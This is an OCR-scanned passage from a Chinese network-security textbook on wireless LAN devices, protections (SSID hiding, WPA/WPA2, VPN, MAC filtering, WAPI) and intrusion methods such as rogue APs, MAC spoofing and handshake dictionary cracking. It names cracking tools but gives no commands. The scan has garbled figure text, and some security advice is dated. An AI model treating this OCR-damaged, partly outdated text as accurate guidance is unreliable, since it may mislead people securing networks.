信号 衰减 过 多 而 导致 通信 失败 。 无 线 AP 相当 于 一 个 无 线 集线器 Nal 
(Hub)， 接 在 有 线 交换 机 或 路 由 器 上 ， 为 与 它 连 接 的 无 线 网 卡 从 路 由 
器 那里 分 得 全 。AP 设备 如 图 8-3 所 示 。 图 83 无 线 AP 设备 


3. 无 线路 由 器 


从 名 称 上 就 可 以 知道 这 种 设备 具有 路 由 的 功能 。 无 线路 由 器 是 单纯 型 AP 与 宽带 路 由 
器 的 一 种 结合 ， 它 借助 于 路 由 器 功能 ， 可 实现 家 庭 无 线 网 络 中 的 Intemet 连接 共享 ， 实 现 
ADSL 和 小 区 宽带 的 无 线 共享 接 入 。 另 外 ， 无 线路 由 器 可 以 把 通过 它 进行 无 线 和 有 线 连 接 
的 终端 都 分 配 到 一 个 子 网 ， 这 样子 网 内 的 各 种 设备 交换 数据 就 非常 方便 。 无 线路 由 器 直接 
接 上 上 层 交 换 机 或 ADSL 猫 等 ， 因 为 大 多 数 无 线路 由 器 都 支持 PPOE 拨号 功能 。 


4. 无 线 网 桥 
无 线 网 桥 它 可 以 用 于 连接 两 个 或 多 个 独立 的 网 络 段 ， 这 些 独 立 的 网 络 段 通常 位 于 不 同 
的 建筑 内 ， 相 距 几 百 米 到 几 十 公里 。 所 以 说 它 可 以 广泛 应 用 在 不 同 建筑 物 间 的 互联 。 同 
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时 ， 根 据 协议 不 同 ， 无 线 网 桥 又 可 以 分 为 2.4GHz 频段 的 802.11b、802.11g 和 802.11n 的 无 
线 网 桥 以 及 采用 5.8GHz 频段 的 802.11a 和 802.11n 的 无 线 网 桥 。 无 线 网 桥 有 三 种 工作 方 
式 ， 即 点 对 点 、 点 对 多 点 、 中 继 桥 接 ， 特 别 适 用 于 城市 中 的 远 距 离 通信 。 

无 线 网 桥 通 常用 于 室外 ， 主 要 用 于 连接 两 个 网 络 。 无 线 网 桥 不 可 能 只 使 用 一 个 ， 必 须 
两 个 以 上 ， 而 AP 可 以 单独 使 用 。 无 线 网 桥 功率 大 ， 传 输 距离 远 ( 最 大 可 达 50km)， 抗 干扰 
能 力 强 ， 不 自 带 天 线 ， 一 般配 备 抛物 面 天 线 实现 长 距离 的 点 对 点 连接 。 


5. 天 线 


无 线 局 域 网 天 线 可 以 扩展 无 线 网 络 的 覆盖 范围 ， 把 不 同 的 办 公 大 楼 连接 起 来 。 这 样 ， 
用 户 可 以 随身 携带 笔记 本 电脑 在 大 楼 之 间或 在 房间 之 间 移 动 。 当 计算 机 与 无 线 AP 或 其 他 
计算 机 相距 较 远 时 ， 随 着 信号 的 减弱 ， 或 者 传输 速率 明显 下 降 ， 或 者 根本 无 法 实现 与 AP 
或 其 他 计算 机 之 间 通 信 ， 此 时 ， 就 必须 借助 于 无 线 天 线 对 所 接收 或 发 送 的 信号 进行 增益 
(放大 )。 

无 线 天 线 有 多 种 类 型 ， 不 过 常见 的 有 两 种 : 一 种 是 室内 天 线 ， 优 点 是 方便 灵活 ， 缺 点 
是 增益 小 ， 传 输 距离 短 ， 一 种 是 室外 天 线 ， 优 点 是 传输 距离 远 ， 比 较 适合 远 距离 传输 。 

无 线 AP 设备 在 网 络 中 的 应 用 如 图 8-4 的 网 络 拓扑 图 所 示 。 
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图 8-4” 带 有 无 线 网 络 的 网 络 拓扑 结构 


8.2 无 线 网 络 安全 技术 
8.2.1 SSID 及 其 隐藏 


在 网 络 中 ， 服 务 集 (Service Seb 是 与 IEEE 802.11 无 线 局 域 网 相关 的 所 有 设备 ， 服 务 集 
可 以 是 本 地 的 、 独 立 的 、 扩 展 的 或 者 网 格 状 ( 多 跳 ) 的 。 
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1. BSS、ESS 与 SSID 


基本 服务 集 (Basic Service Set，BSS) 是 802.11 网 络 的 基本 元 件 ， 由 一 组 彼此 通信 的 工 
作 站 构成 。 工 作 站 之 间 的 通信 在 某 个 模糊 地 带 进行 ， 称 为 基本 服务 区 域 (Basic Service 
Area)， 此 区 域 受 限于 所 使 用 无 线 介质 的 传播 特性 。 只 要 位 于 基本 服务 区 域 ， 工 作 站 就 可 以 
跟 同 一 个 BSS 的 其 他 成 员 通 信 。 简 单 来 说 ， 在 一 个 基础 架构 网 络 中 ，BSS 就 相当 于 一 个 无 
线 接 入 点 ， 而 BSSID(Basic Service Set IDentifier) 相 当 于 这 个 无 线 接 入 点 的 MAC 地 址 。 

BSS 的 服务 范围 ， 可 以 涵盖 整个 小 型 办 公 室 或 家 庭 ， 无 法 服务 较 广 的 区 域 。802.11 多 
许 将 几 个 BSS 串 连 为 延伸 式 服务 组 合 后 称 为 ESS(Extented Service Set， 扩 展 服务 集 )， 借 此 
延伸 无 线 网 络 的 覆盖 区 域 。 所 谓 ESS， 就 是 利用 骨干 网 络 将 几 个 BSS 串联 在 一 起 。 所 有 位 
于 同一 个 ESS 的 无 线 接 入 点 将 会 使 用 相同 的 服务 集 标识 ， 通 常 就 是 使 用 者 所 谓 的 “无 线 网 
络 名 称 ”。 

SSID(Service Set IDentifier) 中 文 叫 作 服 务 集 标识 。SSID 技术 可 以 将 一 个 无 线 局 域 网 分 
为 几 个 需要 不 同 身份 验证 的 子 网 络 ， 每 一 个 子 网 络 都 需要 独立 的 身份 验证 ， 只 有 通过 身份 
验证 的 用 户 才 可 以 进入 相应 的 子 网 络 ， 防 止 未 被 授权 的 用 户 进入 本 网 络 。SSID 编码 从 0 开 
始 ， 最 多 32 个 字符 。 


2. 将 BSS、ESS 与 BSSID、ESSID 和 SSID 联合 起 来 理解 


一 家 公司 面积 比较 大 ， 安 装 了 若干 台 无 线 接 入 点 (AP 或 者 无 线路 由 器 )， 公 司 员工 只 需 
要 知道 一 个 SSID 就 可 以 在 公司 范围 内 任意 地 方 接 入 无 线 网 络 。BSSID 其 实 就 是 每 个 无 线 
接 入 点 的 MAC 地 址 。 当 员工 在 公司 内 部 移动 的 时 候 ，SSID 是 不 变 的 。 但 BSSID 随 着 员 
工 切换 到 不 同 的 无 线 接 入 点 ， 是 在 不 停 变化 的 。 

ESS 包括 了 网 络 中 所 有 的 BSS。 一 般 ESSID 就 是 SSID 。 


3. SSID 的 安全 与 隐藏 


为 了 方便 用 户 接 入 ， 目 前 绝 大 多 数 的 路 由 器 和 AP 都 允许 用 户 可 以 搜索 到 该 接 入 点 公 
开 的 SSID 标识 ， 这 是 由 无 线路 由 器 进行 SSID 广播 实现 的 。 需 要 注意 的 是 ， 目 前 同一 厂商 
所 生产 的 无 线路 由 器 ， 其 默认 的 SSID 都 是 一 样 的 ， 或 者 差别 不 大 ， 后 面 6 位 使 用 的 是 该 
路 由 器 的 MAC 地 址 的 后 6 位 ， 这 在 使 用 的 过 程 中 很 不 安全 。 

一 旦 那些 企图 非法 连接 的 攻击 者 利用 通用 的 初始 化 字符 串 来 连接 无 线 网 络 ， 就 极 易 建 
立 起 一 条 非法 的 连接 ， 从 而 给 该 无 线 网 络 带 来 威胁 。 因 此 建议 用 户 在 配置 无 线 网 络 的 时 
候 ， 更 改 默认 的 SSID。 

但 需要 注意 : 在 更 改 SSID 的 时 候 ， 最 好 使 用 数字 + 字母 组 合 的 名 字 ， 最 好 不 要 使 用 中 
文 ， 因 为 有 的 无 线 终端 设备 的 无 线 网 卡 不 支持 中 文 的 SSID， 即 它们 搜索 不 到 中 文 名 称 的 无 
线 网 络 。 

为 了 无 线 安全 ， 最 好 的 做 法 其 实 是 关闭 无 线路 由 器 上 面 的 SSID 广播 功能 ， 这 样 攻击 
者 将 无 法 直接 知道 该 无 线 网 络 的 存在 。 但 关闭 SSID 广播 后 ， 会 给 用 户 的 使 用 带 来 极 大 的 
不 方便 ， 特 别 是 当 有 新 的 设备 需要 接 入 无 线 网 络 的 时 候 ， 设 置 起 来 非常 的 困难 。 

综合 无 线 网 络 安全 和 无 线 网 络 使 用 的 方便 性 ， 建 议 开 启 SSID 广播 功能 ， 但 应 该 使 用 
复杂 的 加 密 方式 。 推 荐 使 用 WPA2 和 WPA 混合 加 密 的 方式 ， 这 种 加 密 方 式 是 目前 最 安全 
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的 ， 不 容易 被 黑客 破解 。 


可 以 在 无 线路 由 器 中 设置 关闭 SSID 广播 以 实现 SSID 的 隐藏 ， 如 图 8-5 所 示 。 





本 页 面 设置 路 由 器 无 线 网 络 的 基本 多 数 。 





SSID 吕 : TP-UNK_C06970 
醒 式 : [tegn moved Iv] 
频 惧 过夜 : 。 [自动 Iv] 

团 开 启 无 线 功 能 


口 开启 ms 


8-5 ”路 由 器 设置 中 的 SSID 与 SSID 广播 设置 











8.2.2 WPA 和 WPA2 


WPA 加 密 协议 属于 802.11 协议 标准 ， 其 出 现 是 为 了 解决 之 前 WEP 的 安全 漏洞 。 
WPA 全 称 为 “WiFi 保护 访问 ”(The WiFi Protected Access)。 但 需要 注意 的 是 ， 在 WPA 中 
使 用 字典 或 者 过 短 的 密码 仍然 是 不 安全 的 ，WPA 的 长 密码 几乎 是 不 能 被 破解 的 。 第 二 代 
WPA， 即 WPA2 协议 基于 IEEE 802.11i， 符 合 FIPS 140-2 (美国 联邦 信息 处 理 标准 ) 的 规 
定 。 用 户 一 旦 获得 这 些 密码 ， 就 可 以 读 取 所 有 流量 数据 。 

所 有 支持 WEP 的 无 线 网 络 设备 都 可 以 升级 到 WPA， 但 部 分 较 旧 的 设备 无 法 升级 到 
WPA2。WPA 是 802.11i 安全 标准 的 简洁 版 本 。WPA 和 WPA2 都 使 用 了 改进 的 TKIP 加 密 
算法 ， 同 时 还 可 使 用 广泛 应 用 于 802.11i 的 AES-CCMP 算法 。 

WPA 和 WPA2 分 别 分 为 企业 版 和 个 人 版 。 企 业 版 的 带 有 802.1X+EAP 认证 的 TKIP 技 
术 ; 个 人 版 的 采用 预 设 密 钥 的 PSK 技术 。 企 业 版 是 考虑 到 企业 往往 需要 更 高 的 安全 级 别 ， 
而 个 人 版 则 希望 能 有 较 高 的 安全 级 别 但 同时 又 不 至 于 复杂 到 没 法 用 的 地 步 。 企 业 版 需要 有 
专用 的 服务 器 来 发 放 和 验证 证 书 ， 不 使 用 密码 ; 个 人 版 则 不 需要 专用 的 证 书 ， 可 以 使 用 预 
先 设 定 的 密码 ( 预 共享 密 钥 ，Pre-Shared Key，PSK)。 所 以 很 多 地 方 又 将 WPA- 个 人 或 者 
WPA2- 个 人 称 为 WPA-PSK 和 WPA2 - PSK。 

如 果 WPA-PSK 或 WPA2-PSK 使 用 了 弱 口 令 ， 则 可 在 截获 用 户 登 出 再 重新 建立 连接 时 
的 四 路 握手 信息 后 ， 对 其 使 用 离线 字典 方式 进行 破解 。Aircrack-ng 等 破解 软件 可 在 1 分 钟 
内 破解 弱 口 令 ， 其 他 破解 软件 还 有 AirSnort、Auditor Security Collection 等 。 但 是 使 用 强壮 密 
码 (8 一 63 个 ASCI 字符 ) 或 者 64 字符 的 十 六 进 制 的 密码 时 ，WPA 个 人 版 仍然 是 相对 安全 的 。 

WPA 企业 版 还 可 以 提供 基于 RADIUS(Remote Authentication Dial In User Service， 远 
程 用 户 拨号 认证 ) 系 统 的 802.1x 认证 。WPA 个 人 版 使 用 8 一 63 字符 的 预 共 享 密 钥 (PSK)， 
该 预 共 享 密 钥 PSK 也 支持 64 字符 的 十 六 进 制 字符 串 输入 。 


8.2.3 VPN 


在 802.11 标准 中 也 支持 VPN 虚拟 私有 网 络 ( 非 持 续 性 安全 网 络 连接 )。 虚 拟 私有 网 络 
(Virtual Private Network) 技 术 从 20 世纪 90 年 代 以 来 一 直 被 作为 一 种 点 到 点 的 安全 方式 。 这 
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种 技术 已 经 获得 了 广泛 的 使 用 ， 其 被 证 明 的 安全 性 可 以 轻易 地 被 转换 到 无 线 网 络 中 。 

在 一 个 WLAN 客户 端 使 用 一 个 VPN 隧道 时 ， 数 据 通信 保持 加 密 状 态 直到 它 到 达 VPN 
网 关 ， 此 网 关 位 于 无 线 访问 点 之 后 (如 图 8-6 所 示 )。 这 样 一 来 ， 入 侵 者 就 被 阻止 ， 使 其 无 
法 截获 未 加 密 的 网 络 通信 。 因 为 VPN 对 从 PC 到 位 于 公司 网 络 核心 的 VPN 网 关 之 间 的 整 
个 连接 加 密 ， 所 以 PC 和 访问 点 (AP) 之 间 的 无 线 网 络 部 分 也 被 加 密 。VPN 连接 可 以 借助 于 
多 种 凭证 进行 管理 ， 包 括 口令 、 证 书 、 智 能 卡 等 。 可 以 看 出 ， 这 是 保证 企业 级 无 线 网 络 安 
全 的 又 一 个 重要 方法 。 图 8-6 为 一 个 典型 的 VPN 连接 示意 图 。 
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VPN 包含 PPTP、L2TP、IPsec 和 SSH 等 协议 ， 然 而 VPN 也 可 以 使 用 多 种 工具 进行 破 
解 ， 如 破解 PPTP 的 Anger、Deceit 、Ettercap 等 工具 ，ike-scan、IKEProbe、ipsectrace、 
IKEcrack 等 破解 IPSec 的 工具 。 


8.2.4 MAC 地 址 过 滤 


无 线 MAC 地 址 过 滤 是 保护 无 线 网 络 安全 最 简单 的 方法 之 一 ， 该 功能 通过 MAC 地 址 
允许 或 拒绝 无 线 网 络 中 的 计算 机 访问 广域网 ， 有 效 控制 无 线 网 络 内 用 户 是 否 有 权限 连接 到 
网 络 。 但 是 非法 用 户 依然 可 以 嗅 探 到 合法 用 户 的 MAC 地 址 并 伪装 成 这 个 地 址 。 无 线路 由 
器 中 的 MAC 地 址 过 滤 设 置 如 图 8-7 中 所 示 。 其 中 图 8-7(a) 所 示 为 路 由 器 选择 添加 一 个 新 的 
规则 ， 图 8-7(b) 所 示 为 该 新 的 MAC 地 址 内 容 。 





本 页 设 轩 tc 寺 直 这 深 末 辽 制 半 算 机 对 本 无 续 J6B3 矶 问 * 
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(b) 
图 8-7 无 线路 由 器 中 的 MAC 地 址 过 滤 设置 ( 续 ) 
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8.2.5 静态 IP 地 址 


无 线 网 络 AP 或 路 由 器 通常 都 会 通过 DHCP 为 用 户 提供 静态 PP。 静态 IP 地 址 只 能 用 
来 防止 意外 侵入 和 低级 别 的 黑客 。 对 于 老练 的 黑客 ， 静 态 IP 几乎 起 不 到 保护 网 络 安全 的 作 
用 。 静 态 卫 一 旦 被 盗用 ， 不 仅 对 网 络 的 正常 使 用 造成 影响 ， 同 时 由 于 被 盗用 的 地 址 往往 具 
有 较 高 的 权限 ， 因 而 也 容易 给 合法 用 户 造成 损失 和 潜在 的 安全 隐患 。 解 决 这 种 问题 的 常用 
方法 有 以 下 两 种 : 一 种 是 IP-MAC 地 址 绑 定 ， 常 常 针对 网 关 而 言 的 。 另 一 种 是 设 定 静态 
ARP 表 ， 局 域 网 内 所 有 需要 互 访 的 电脑 间 ， 为 确保 不 被 冒充 ， 如 果 必 要 ， 每 一 台 都 需 设置 
要 互 访 的 电脑 的 静态 ARP 表 。 


8.2.6 WAPI 


WAPI(Wireless LAN Authentication and Privacy Infrastructure， 无 线 局 域 网 鉴别 和 保密 
基础 结构 ) 是 一 种 安全 协议 ， 同 时 也 是 中 国 无 线 局 域 网 安全 强制 性 标准 。 

WAPI 像 红 外 线 、 蓝 牙 、GPRS、CDMAIX 等 协议 一 样 ， 是 无 线 传输 协议 的 一 种 ， 只 
不 过 它 是 无 线 局 域 网 WLAN) 中 的 一 种 传输 协议 ， 与 802.11 传输 协议 是 同一 领域 的 技术 。 
与 WiFi 的 单 向 加 密 认 证 不 同 ，WAPI 双向 均 认证 ， 从 而 保证 传输 的 安全 性 。WAPI 安全 系 
统 采用 公 钥 密码 技术 ， 鉴 权 服 务 器 AS 负责 证 书 的 颁发 、 验 证 与 吊销 等 ， 无 线 客户 端 与 无 
线 接 入 点 AP 上 都 安装 有 AS 颁发 的 公 钥 证 书 ， 作 为 自己 的 数字 身份 凭证 。 当 无 线 客户 端 
登录 至 无 线 接 入 点 AP 时 ， 在 访问 网 络 之 前 必须 通过 鉴别 服务 器 AS 对 双方 进行 身份 验 
证 。 根 据 验证 的 结果 ， 持 有 合法 证 书 的 移动 终端 才能 接 入 持 有 合法 证 书 的 无 线 接 入 点 AP。 


8.2.7 智能卡、USB 加 密 卡 、 软 件 令 牌 


使 用 这 些 安全 卡 是 一 种 非常 有 效 的 安全 保护 手段 。 这 些 硬件 或 软件 口令 卡 配合 服务 器 
软件 ， 可 以 使 用 其 内 部 的 身份 识别 码 配 合用 户 的 密码 产生 一 个 健壮 的 算法 ， 通 过 该 算法 可 
以 生成 一 个 新 的 密码 。 服 务 器 会 及 时 与 口令 卡 同步 。 这 种 方式 对 于 无 线 网 络 数据 传输 来 说 
非常 安全 。 这 些 安全 设备 和 软件 的 制造 商 众多 ， 但 是 这 些 安全 设备 成 本 相对 较 高 。 另 一 种 
最 安全 的 方法 是 使 用 RADIUS 服务 器 的 WPA2/WPA 加 密 。 这 两 种 方法 都 可 以 提供 安全 可 
靠 的 无 线 服务 。 


8.2.8 射频 信号 屏蔽 

实践 中 可 以 采用 特殊 的 墙 面 油漆 涂料 和 窗帘 来 很 大 程度 地 阻止 房间 内 的 无 线 信 号 向 外 
传播 ， 这 样 就 可 以 防止 黑客 在 房间 或 建筑 物 外 面 搜索 到 无 线 信 号 ， 从 而 从 根本 上 切断 入 侵 
无 线 网 络 的 可 能 性 而 保护 了 无 线 网 络 安 全 。 
8.2.9 ”对 无 线 接 入 点 进行 流量 监控 


最 后 一 项 安全 措施 是 对 企业 网 络 采 取 7x24 小 时 的 监控 。 这 些 监控 包括 对 AP、 路 由 


(220\. 


no 区 >》 计算 机 网 络 安全 教程 


器 、 服 务 器 、 防 火 墙 日 志 来 侦 测 非 正常 的 活动 。 比 如 监测 到 清晨 一 个 巨大 的 文件 通过 某 一 
AP 进行 了 传输 ， 就 应 当 引 起 安全 部 门 的 注意 和 严肃 调查 。 

另外 ， 对 员工 和 合同 商 进行 安全 风险 与 个 人 防护 措施 等 安全 教育 也 非常 必要 。IT 部 门 
应 当 及 时 告知 员工 新 出 现 的 安全 威胁 。 如 果 员工 受到 教育 ， 将 会 大 大 降低 员工 因为 锁定 笔 
记 本 电脑 或 者 随意 安装 路 由 器 和 AP 等 行为 带 来 的 安全 风险 。 员 工 应 当知 道 企 业 的 移动 设 
备 会 使 企业 网 络 、 数 据 安全 会 延伸 至 企业 外 部 ， 比 如 威胁 和 攻击 最 常见 的 咖啡 店 Starbucks。 


8.3 无 线 网 络 入 侵 与 防御 


当代 人 的 生活 越 来 越 离 不 开 移动 网 络 ， 尤 其 是 在 网 速 提升 、 网 络 资源 进一步 丰富 、 网 
络 应 用 多 媒体 性 能 更 出 众 的 今天 ， 使 用 无 线 网 络 相 比 以 前 会 产生 更 多 的 数据 流量 ， 因 此 大 
部 分 用 户 会 优先 使 用 WiFi 网 络 ， 以 节省 移动 运营 商 的 上 网 资费 。 

比 起 有 线 网 络 ， 恶 意 入 侵 者 更 容易 捕获 散布 在 空间 中 的 无 线 信号 。 当 前 恶意 入 侵 者 通 
常 通过 搭建 免费 WiFi、 伪 装 成 某 一 公共 WiFi 来 骗取 信号 覆盖 范围 内 的 用 户 登录 ， 从 而 截 
获 用 户 网 络 数据 ， 并 结合 木马 、 钓 鱼 等 方式 获取 用 户 密码 、 侵 入 用 户 的 移动 设备 或 者 盗 取 
用 户 银 行 资金 。 

3G、4G 移动 通信 网 络 通过 更 严格 的 鉴 权 认证 、 用 户 身份 认证 、 数 据 加 密 等 方法 来 保 
护 网 络 安全 ， 入 侵 者 很 难 伪造 和 搭建 移动 信号 接 入 点 ， 即 便 使 用 伪 基 站 也 只 能 向 用 户 单 向 
发 送 短信 息 。 但 这 些 短信 往往 冒充 合法 服务 商 的 号 码 和 内 容 ， 可 以 进一步 将 用 户 引 向 钓鱼 
网 站 和 挂 有 木马 的 网 站 。 

无 线 局 域 网 络 安全 内 容 来 源 于 有 线 网 络 安全 ， 入 侵 技术 主要 集中 于 骗取 用 户 使 用 伪造 
或 者 恶意 WiFi， 安 全 相关 的 技术 也 主要 集中 于 802.11 协议 集 、SSID 等 技术 。 另 外 通过 蓝 
牙 等 技术 和 协议 的 入 侵 也 存在 。 


8.3.1 无 线 网 络 安全 面临 的 挑战 


无 线 网 络 具有 较 强 的 开放 性 ， 防 御 的 边界 不 固定 ， 传 播 的 信号 具有 多 方位 的 特点 ， 黑 
客 能 够 从 无 线 网 络 的 多 个 方位 进行 入 侵 ， 导 致 多 个 接 入 点 的 安全 遭 到 破坏 ， 此 外 ， 无 线 网 
络 终 端的 移动 性 较 大 ， 能 够 随时 随地 接 入 网 络 ， 不 受 时 间 和 空间 的 限制 ， 甚 至 能 够 跨越 较 
大 的 地 域 进 行 漫 游 ， 为 黑客 等 入 侵 者 提供 了 可 乘 之 机 。 

无 线 网 络 面临 的 主要 问题 可 以 分 以 下 两 类 。 

(1) 非法 主机 接 入 合法 AP。 由 于 无 线 电波 传播 的 特殊 性 ， 只 要 在 信号 覆盖 范围 内 ， 都 
能 窃取 信号 信息 ， 所 以 WLAN 极 易 遭受 War driving( 接 入 点 映射 ， 这 是 一 种 在 驾车 围绕 企 
业 或 住所 邻里 时 扫描 无 线 网 络 名 称 的 活动 ) 入 侵 ， 即 攻击 者 使 用 带 有 无 线 网 卡 的 移动 节点 
利用 NetStumbler 等 无 线 网 络 侦 测 工具 就 可 以 很 容易 地 检测 到 周围 所 有 的 无 线 网 络 ， 获 得 
每 个 AP 的 信息 (如 SSID、 工 作 频 道 、 信 号 强度 等 )， 如 果 非 法 用 户 进一步 破解 了 无 线 加 密 
协议 或 者 发 现 网 络 管理 者 使 用 了 admin 之 类 的 简单 账号 和 密码 ， 进 而 获取 登录 密码 ， 就 可 
以 接 入 到 合法 AP 所 在 的 无 线 网 络 ， 从 而 盗 取 局 域 网 内 的 机 密 信息 或 者 进一步 实施 入 侵 。 

(2) 合法 主机 接 入 非法 AP。 现 在 无 线 AP 的 应 用 非常 普及 。 任 何 个 人 都 能 架设 无 线 网 
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络 设备 ， 提 供 无 线 接 入 功能 ， 无 形 中 已 经 敞开 了 内 部 局 域 网 的 信息 大 门 。 也 为 放置 非法 
AP 提供 了 可 乘 之 机 。 比 如 802.11b 协议 采用 的 是 单 向 认证 ， 而 不 是 互相 认证 ， 即 AP 鉴别 
用 户 ， 但 用 户 不 能 鉴别 AP， 因 此 攻击 者 可 以 轻易 地 将 自己 伪装 成 AP。 因 为 移动 节点 会 将 
自己 切换 到 信号 最 强 的 网 络 ， 如 果 攻 击 者 有 一 个 强 的 信号 发 射 源 ， 就 可 以 让 用 户 尝试 登录 
到 自己 的 网 络 ， 这 样 攻击 者 就 能 通过 分 析 发 现 密 钥 和 口令 ， 使 得 非法 “劫持 ”合法 用 户 信 
息 成 为 可 能 。 

有 些 没有 使 用 无 线 网 络 入 口 的 企业 和 组 织 认为 自己 并 不 需要 担心 无 线 网 络 带 来 的 安全 
问题 ， 但 几乎 所 有 员工 使 用 的 智能 手机 和 笔记 本 电脑 都 带 有 无 线 网 卡 ， 移 动 带 来 便利 的 同 
时 ， 也 带 来 了 巨大 的 安全 问题 。 黑 客 发 现 相 对 于 有 线 网 络 和 设备 ， 无 线 网 络 和 设备 更 易于 
侵入 ， 甚 至 能 通过 无 线 网 络 进一步 侵入 到 有 线 网 络 中 。 

无 线 网 络 用 户 的 安全 风险 随 着 无 线 网 络 服务 的 普及 而 增 大 。 在 无 线 网 络 诞生 的 时 期 ， 
无 线 网 络 相对 安全 ， 因 为 黑客 们 还 没有 顾及 这 个 领域 ， 无 线 网 络 在 工作 场所 也 不 常见 。 尽 
管 无 线 网 络 技术 在 近 几 年 发 展 和 普及 迅速 ， 但 当前 的 相关 协议 和 加 密 方法 仍然 有 不 完善 的 
地 方 ， 另 外 用 户 和 企业 薄弱 的 网 络 安全 意识 使 得 无 线 网 络 安全 依然 面临 着 严峻 挑战 。 借 助 
无 线 网 络 ， 黑 客 技术 也 发 展 得 更 为 复杂 和 新 颖 ， 网 络 上 也 有 很 多 基于 Windows 和 Linux 系 
统 的 易于 使 用 的 免费 黑客 工具 。 


8.3.2 无线 网 络 入 侵 方式 


无 线 网 络 的 安全 除了 与 无 线 网 络 标准 有 关外 ， 还 与 连接 设备 的 功能 和 数据 传输 的 方式 
等 有 关 ， 这 些 方面 会 因为 底层 数据 的 结构 和 编程 方法 不 同 而 对 安全 产生 不 同 的 影响 。 从 某 
种 程度 来 说 ， 网 络 安全 防范 依赖 于 已 知 的 攻击 方式 和 方法 ， 不 同 的 网 络 环境 以 及 网 站 和 软 
件 的 编写 情况 都 会 产生 新 的 威胁 ， 因 此 网 络 安全 防范 也 要 随 之 改进 。 下 面 介绍 的 是 几 种 典 
型 的 攻击 方式 (没有 涵盖 全 部 入 侵 方 式 )。 

(1) 意外 侵入 : 入 侵 网 络 除 了 在 方法 不 同 外 ， 主 观 目 的 也 有 可 能 不 同 。 意 外 侵入 指 主 
观 上 并 不 是 故意 侵入 到 未 授权 网 络 中 。 发 生意 外 侵入 时 ， 侵 入 者 自己 甚至 都 有 可 能 不 知道 
侵入 的 发 生 。 意 外 侵入 显示 出 无 线 网 络 的 脆弱 性 ， 也 被 称 为 "错误 接 入 ”， 除 非 故意 的 接 
入 网 络 外 ， 也 包含 黑客 架设 无 线 网 络 引诱 用 户 接 入 。 

(2) 恶意 入 侵 : 恶意 入 侵 指 黑客 可 以 将 带 有 无 线 网 卡 的 笔记 本 电脑 伪装 成 一 个 AP。 
这 个 笔记 本 电脑 被 称 为 “ 软 AP”， 软 AP 可 通过 软件 实现 。 黑 客 一 旦 侵入 到 网 络 中 ， 就 可 
以 盗 取 密码 、 植 入 木马 以 及 对 有 线 网 络 展开 攻击 。 由 于 无 线 网 络 工作 在 数据 链 路 层 ， 所 以 
网 络 层 的 网 络 身 份 认 证 、VPN 等 安全 防护 手段 并 不 起 作用 。802.1x 的 身份 认证 虽然 能 够 起 
到 一 定 的 安全 保护 作用 ， 但 面 对 黑 客 依然 显得 很 脆弱 ， 因 为 黑客 攻击 的 思路 并 不 是 攻 入 
VPN 或 其 他 安全 防护 ， 最 有 可 能 的 情况 是 在 数据 链 路 层 接管 客户 端 。 

(3) 自 组 织 网 络 : 英文 名 称 为 Ad hoc network， 指 由 若干 个 移动 的 无 线 通信 终端 构成 
的 一 个 临时 应 变 的 网 络 。 这 种 网 络 是 临时 性 的 、 无 中 心 的 、 无 须 依靠 任何 基础 设施 的 非 标 
准 网 络 。 也 有 人 称 其 为 “特定 网 络 ”， 是 因为 它 是 很 短 距离 的 特定 连接 ， 并 且 只 能 用 于 近 
距离 的 用 户 ;又 因为 它 是 便于 加 入 和 离开 ， 既 能 主 控 、 又 能 被 控 的 网 络 ， 所 以 又 有 人 称 之 
为 “对 等 网 络 ”。 自 组 织 网 络 的 漏洞 并 不 是 自 组 织 网 络 本 身 ， 而 是 该 网 络 与 其 他 网 络 桥接 
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时 产生 的 ， 通 常 存在 于 一 个 协作 网 络 环境 中 。 不 幸 的 是 大 多 数 Windows 系统 的 自 组 织 网 络 
功能 默认 是 被 打开 的 ， 此 时 如 果 用 户 同时 使 用 有 线 或 无 线 网 络 ， 就 会 桥接 到 不 安全 的 Ad 
hoc 网 络 中 。 这 里 的 桥接 有 两 种 形式 ， 其 中 直接 桥接 要 求 用 户 在 两 个 连接 之 间 实 际 配 置 一 
个 桥接 ， 只 有 在 需要 时 才 被 启动 。 而 间接 桥接 分 享用 户 的 计算 机 资源 。 间 接 桥接 有 两 个 安 
全 隐患 ， 第 一 是 尽管 终端 用 户 的 数据 和 有 线 网 络 安全 得 到 有 效 保证 ， 但 通过 Ad hoc 依然 可 
以 威胁 到 这 些 数据 。 二 是 病毒 、 木 马 等 恶意 程序 和 代码 可 以 通过 不 安全 Ad hoc 植 入 到 用 户 
计算 机 中 ， 这 样 就 可 以 获得 侵入 安全 网 络 的 路 径 。 在 这 种 情况 下 ， 恶 意 代码 植 入 者 并 不 需 
要 破解 或 者 知道 安全 网 络 的 口令 ， 只 需要 将 恶意 程序 植 入 拥有 合法 口令 的 用 户 计 算 机 
即 可 。 

(4) 非 传统 网 络 : 这 种 网 络 主要 指 蓝牙 设备 等 使 用 的 个 人 网 络 ， 这 些 网 络 也 存在 安全 
风险 ， 甚 至 条 形 码 扫描 器 、 无 线 打印 机 、 扫 描 仪 的 安全 也 应 当 被 重视 。 

(5) MAC 地 址 欺骗 : MAC 地 址 欺骗 指 黑客 监听 网 络 流量 以 及 使 用 网 络 权限 确定 设备 
MAC 地 址 。 大 多 数 无 线 网 络 系统 可 以 只 允许 绑 定 MAC 地 址 的 设备 访问 和 使 用 网 络 ， 即 
MAC 过 滤 的 功能 。 然 而 ， 有 些 程序 带 有 网 络 嗅 探 功 能 ， 黑 客 将 这 些 程序 与 其 他 软件 结合 
使 用 ， 就 可 以 使 自己 的 设备 伪装 成 任意 MAC 地 址 ， 这 样 黑 客 就 能 突破 MAC 地 址 过 滤 的 
限制 。MAC 过 滤 只 对 小 型 网 络 有 效 ， 因 为 它 只 对 “ 停 播 ”的 无 线 设 备 起 保护 。 一 个 
802.11 设备 在 “广播 ” 时， 其 MAC 地 址 在 802.11 数据 头 中 是 不 被 加 密 的 ， 很 容易 被 监测 
到 。802.11 的 接收 设备 (笔记 本 和 无 线 网 卡 ) 配 合 免费 的 无 线 数据 包 分 析 软 件 ， 就 可 以 获得 
MAC 地 址 。 在 所 谓 安全 的 网 络 环境 中 ， 大 多 数 无 线 设备 都 处 于 “广播 ”状态 ，MAC 过 滤 
只 能 防 君子 (意外 侵入 ) 而 不 能 防 小 人 (恶意 伪装 )。 

(6) 中 间 人 攻击 : 中 间 人 攻击 (Man-in-the-Middle Attack， 简 称 MITM 攻击 ) 是 一 种 
“间接 ”的 入 侵 攻击 ， 这 种 攻击 模式 是 通过 各 种 技术 手段 将 受 入 侵 者 控制 的 一 台 计 算 机 虚 
